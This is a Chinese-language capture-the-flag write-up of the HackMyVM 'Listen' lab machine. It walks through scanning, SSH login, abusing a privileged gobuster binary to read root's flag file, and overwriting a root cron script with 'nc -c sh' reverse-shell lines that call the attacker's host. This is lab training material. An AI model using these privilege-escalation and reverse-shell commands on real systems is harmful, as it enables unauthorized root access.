HackMyVM-Listen靶机详解WP

信息收集

服务探测

ll104567大佬自己出的easy靶机，因为最后的Flag是HMV{xxxxxx}

那就暂且归类到HackMyVM的分类好了

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.145  08:00:27:25:83:90       (Unknown)
192.168.60.254  00:50:56:e0:55:bd       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.969 seconds (130.02 hosts/sec). 4 responded
❯ export ip=192.168.60.145
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.145:22
Open 192.168.60.145:80
^[[B^[[B[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 14:45 CST
Initiating ARP Ping Scan at 14:45
Scanning 192.168.60.145 [1 port]
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 14:45 (0:00:00 remaining)
Completed ARP Ping Scan at 14:45, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:45
Completed Parallel DNS resolution of 1 host. at 14:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:45
Scanning 192.168.60.145 [2 ports]
Discovered open port 80/tcp on 192.168.60.145
Discovered open port 22/tcp on 192.168.60.145
Completed SYN Stealth Scan at 14:45, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.145
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-08 14:45:31 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:25:83:90 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

用户提权

curl一下80端口

❯ curl $ip
<h1>welcome:welcome_again</h1>

猜测大概率用户凭证，ssh登入一下

welcome的默认Shell是sh，不太好操作

换成bash

❯ ssh welcome@$ip
The authenticity of host '192.168.60.145 (192.168.60.145)' can't be established.
ED25519 key fingerprint is SHA256:wjUcj6T6r6sq8a/m+aBJnDgmy0hOeMWF04F18Qfae3Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.145' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux listen 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Could not chdir to home directory /home/welcome: No such file or directory
$ bash
welcome@listen:/$

直接传个linpeas.sh自动化扫一遍吧

welcome@listen:/$ cd /tmp/
welcome@listen:/tmp$ wget 192.168.60.100/linpeas.sh
--2025-01-08 01:53:33--  http://192.168.60.100/linpeas.sh
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827739 (808K) [application/octet-stream]
Saving to: ‘linpeas.sh’

linpeas.sh                            100%[=======================================================================>] 808.34K  --.-KB/s    in 0.02s

2025-01-08 01:53:33 (48.1 MB/s) - ‘linpeas.sh’ saved [827739/827739]

welcome@listen:/tmp$ chmod +x linpeas.sh

文件读取

发现gobuster拥有SGID权限，可以以root的身份运行该程序

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 31K Jul 27  2018 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 315K Jan 31  2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 15K May  4  2018 /usr/bin/bsd-write
-rwsr-sr-x 1 root root 4.8M Feb  3  2019 /usr/bin/gobuster (Unknown SGID binary)
-rwxr-sr-x 1 root tty 35K Jan 10  2019 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43K Oct 11  2019 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 71K Jul 27  2018 /usr/bin/chage
-rwxr-sr-x 1 root mail 19K Dec  3  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 39K Feb 14  2019 /usr/sbin/unix_chkpwd

想到了之前有做过一个靶机也是类似的方案

利用gobuster的-w字典指定文本，扫描kali启动的http服务

welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /root/root.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.60.100:8000/
[+] Threads      : 10
[+] Wordlist     : /root/root.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2025/01/08 01:59:58 Starting gobuster
=====================================================
=====================================================
2025/01/08 01:59:58 Finished
=====================================================
welcome@listen:/tmp$
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.145 - - [08/Jan/2025 15:00:00] "GET / HTTP/1.1" 200 -
192.168.60.145 - - [08/Jan/2025 15:00:00] code 404, message File not found
192.168.60.145 - - [08/Jan/2025 15:00:00] "GET /fd8e2be6-6ac3-46ca-bfe3-ac88e15b27ba HTTP/1.1" 404 -
192.168.60.145 - - [08/Jan/2025 15:00:00] code 404, message File not found
192.168.60.145 - - [08/Jan/2025 15:00:00] "GET /HMV%7Bjust_root_flag%7D HTTP/1.1" 404 -

GET请求时url编码，解码一下即可

这样就拿到flag了，一般到交完flag就结束了

Root提权

但要想真正拿下靶机，还要拿到root Shell

经过一番收集，在/opt目录下有个隐藏的bash脚本.test.sh

welcome@listen:/opt$ ls -al
total 12
drwxr-xr-x  2 root root 4096 Jan  7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16  2020 ..
-rwx------  1 root root   10 Jan  7 05:54 .test.sh

我传个pspy64到靶机，监测一下进程

可以发现有个定时任务每一分钟会执行.test.sh

welcome@listen:/tmp$ wget 192.168.60.100/pspy64
--2025-01-08 02:03:04--  http://192.168.60.100/pspy64
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                100%[=======================================================================>]   2.96M  --.-KB/s    in 0.03s

2025-01-08 02:03:04 (94.2 MB/s) - ‘pspy64’ saved [3104768/3104768]

welcome@listen:/tmp$ chmod +x pspy64
2025/01/08 02:04:01 CMD: UID=0     PID=24807  | /usr/sbin/CRON -f
2025/01/08 02:04:01 CMD: UID=0     PID=24808  | /usr/sbin/CRON -f
2025/01/08 02:04:01 CMD: UID=0     PID=24809  | /bin/sh -c /bin/bash /opt/.test.sh

这里其实是可以想到用gobuster的-o将扫描结果输出到指定的文件

但卡在如何构造一个路径或者命令

因为gobuster在扫到目标后会自动添加一个/

这时候想到bash中可以根据命令执行的判断依据;、&&、||

说白了就是一次输入多个命令，&&、||可以根据前一个的命令返回值$?来判断后面的命令是否执行

具体的解释我贴在下面

那我们就在kali上构造这么个文件夹

❯ mkdir "bin||nc -c sh 192.168.60.100 4444"
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
-------------分隔-----------------------
welcome@listen:/tmp$ echo "bin||nc -c sh 192.168.60.100 4444">dir.txt
welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.60.100:8000/
[+] Threads      : 10
[+] Wordlist     : /tmp/dir.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2025/01/08 02:20:01 Starting gobuster
=====================================================
/bin||nc -c sh 192.168.60.100 4444 (Status: 301)
=====================================================
2025/01/08 02:20:01 Finished
=====================================================
welcome@listen:/tmp$

好的，可以输出我们想要的内容

gobuster加几个参数过滤掉噪声，只输出重要信息

welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt  -n -q
/bin||nc -c sh 192.168.60.100 4444

最后加个-o参数输出内容到/tmp/.test.sh即可

-n 不打印 HTTP 状态码。你可以使用此选项来减少输出的噪声，只关注其他重要信息。

-q 不打印横幅和其他噪音。适用于减少输出中的杂项信息，只显示扫描结果。

welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt  -n -q -o /opt/.test.sh
/bin||nc -c sh 192.168.60.100 4444
welcome@listen:/tmp$ ls -al /opt/
total 12
drwxr-xr-x  2 root root 4096 Jan  7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16  2020 ..
-rwx------  1 root root   35 Jan  8 02:22 .test.sh	##文件被修改了

可以看到pwncat-cs在拿到shell后会自动执行稳定shell的流程

2025/01/08 02:23:01 CMD: UID=0     PID=24919  | /usr/sbin/CRON -f
2025/01/08 02:23:01 CMD: UID=0     PID=24920  | /usr/sbin/CRON -f
2025/01/08 02:23:01 CMD: UID=0     PID=24921  | /bin/sh -c /bin/bash /opt/.test.sh
2025/01/08 02:23:01 CMD: UID=0     PID=24922  | /bin/bash /opt/.test.sh
2025/01/08 02:23:01 CMD: UID=0     PID=24923  | /bin/bash /opt/.test.sh
2025/01/08 02:23:01 CMD: UID=0     PID=24924  | sh -c sh
2025/01/08 02:23:01 CMD: UID=0     PID=24925  | sh
2025/01/08 02:23:01 CMD: UID=0     PID=24926  | sh
2025/01/08 02:23:01 CMD: UID=0     PID=24927  | sh
2025/01/08 02:23:01 CMD: UID=0     PID=24929  | sh
2025/01/08 02:23:01 CMD: UID=0     PID=24928  | sh
2025/01/08 02:23:01 CMD: UID=0     PID=24930  | sh
2025/01/08 02:23:01 CMD: UID=0     PID=24931  | sh
2025/01/08 02:23:01 CMD: UID=0     PID=24932  | sh
2025/01/08 02:23:02 CMD: UID=0     PID=24933  | sh
2025/01/08 02:23:02 CMD: UID=0     PID=24934  | sh
2025/01/08 02:23:02 CMD: UID=0     PID=24936  | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0     PID=24935  | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0     PID=24937  | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0     PID=24938  | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0     PID=24939  | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0     PID=24940  | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0     PID=24941  | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0     PID=24942  | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0     PID=24943  | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0     PID=24944  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24945  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24946  | /usr/bin/script -qc /usr/bin/bash /dev/null
2025/01/08 02:23:03 CMD: UID=0     PID=24947  | sh -c /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24948  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24949  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24950  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24952  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24951  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24953  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24954  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24955  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24956  | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0     PID=24957  | /usr/bin/bash

在kali监听一下端口，就成功拿到Shell了

❯ pwncat-cs -lp 4444
[15:19:10] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[15:23:03] received connection from 192.168.60.145:58318                                                                                    bind.py:84
[15:23:03] 0.0.0.0:4444: normalizing shell path                                                                                         manager.py:957
           0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[15:23:04] 192.168.60.145:58318: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) root@listen:/root# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@listen:/root# cat /root/root.txt
HMV{just_root_flag}
(remote) root@listen:/root# cat /root/user.txt
HMV{just_user_flag}

不过除了这种利用||，还有一种方案就是将nc命令写到文件中，在把文件路径写入.test.sh

welcome@listen:/tmp$ echo 'nc -c sh 192.168.60.100 4444'>exp
welcome@listen:/tmp$ chmod +x exp			## 赋予执行权限
welcome@listen:/tmp$ echo 'tmp/exp'>dir.txt		##重新构造字典
---------------分隔--------------
❯ mkdir -p tmp/exp
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

利用一下

welcome@listen:/tmp$ ls -al /opt/
total 12
drwxr-xr-x  2 root root 4096 Jan  7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16  2020 ..
-rwx------  1 root root   35 Jan  8 02:24 .test.sh
welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt  -n -q -o /opt/.test.sh
/tmp/exp
welcome@listen:/tmp$ ls -al /opt/
total 12
drwxr-xr-x  2 root root 4096 Jan  7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16  2020 ..
-rwx------  1 root root    9 Jan  8 02:30 .test.sh

/opt/.test.sh 脚本尝试执行 /tmp/exp 文件

这样就类似于链接了，你可以随意修改exp，反弹shell方案有很多

Online - Reverse Shell Generator